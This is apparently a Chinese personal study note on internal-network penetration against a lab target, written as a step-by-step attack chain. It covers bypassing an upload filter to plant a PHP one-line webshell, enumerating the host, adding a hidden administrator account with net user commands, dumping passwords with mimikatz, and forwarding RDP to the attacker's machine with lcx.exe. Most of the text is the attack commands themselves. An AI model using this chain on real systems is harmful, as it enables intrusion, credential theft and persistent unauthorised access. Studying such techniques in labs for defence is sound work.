内网渗透的基本思路
1.拿到外网web服务器权限
-
这里我使用的phpstudy搭建的靶机利用站点upload获取到基本web服务器权限。
-
进入站点
- 看到第一关,表示只能上传后缀为jpg|png|gif
-
这里我们借助Burpsuite工具将上传包含一句话木马后缀为png文件,后缀改为php,实现绕过。
一句话木马,后缀为png
- 将包放过后出现一个图片形状,右击获取图片的地址。
http://192.168.146.137/upload/upload/526.php
- 通过蚁剑连接后台
2.查看自己的权限
- 蚁剑右击进入虚拟后台
- 终端输入whoami
desktop-ggg\system(administrator)最高权限
ssss\network\mysql\apache普通权限
3.设法提权
1.查看systeminfo,重点关注操作系统版本,位数(64/32)补丁编号如果没有kb423377(巴西烤肉漏洞)提权
2.ipconfig(查看肉鸡连接了几个网卡,连接几个网络)
3.netstat -ano(查看都有哪些内网主机与本机通信)
netstat -an | findstr "3389"查看端口
4.创建用户
net user bb bb@12345 /add #添加用户
net localgroup administrators bb /add #将用户添加到管理组
net user #查看用户
5.窃取administrator的密码
工具 mimitakz
工具用法: 双击mimitakz.exe ,
mimitakz:
privilege::debug
sekurlsa::logonpasswords 如果是密文(用kali软件)
6.利用新账号或administrator登录。登远程桌面(mstsc)
7.向肉鸡上传lcx.exe文件
8.在黑客机上执行 lcx.exe -listen 44444 55555
9.在肉鸡上执行 lcx.exe -slave 黑客 IP 44444 127.0.0.1 3389
在靶机上运行lcx.exe注意这个软件上传路径,在终端下要进入这个命令才能运行。
10.在黑客机上打开mstsc 127.0.0.1:55555
输入刚刚创建的用户名和密码
登入进去
11.nps /neo-reGeorg /ew/这一类的代理工具代理去带来
注:该文章用于自己学习笔记,切勿用于其它用途,否则本人不负责。
你就这样走了吗???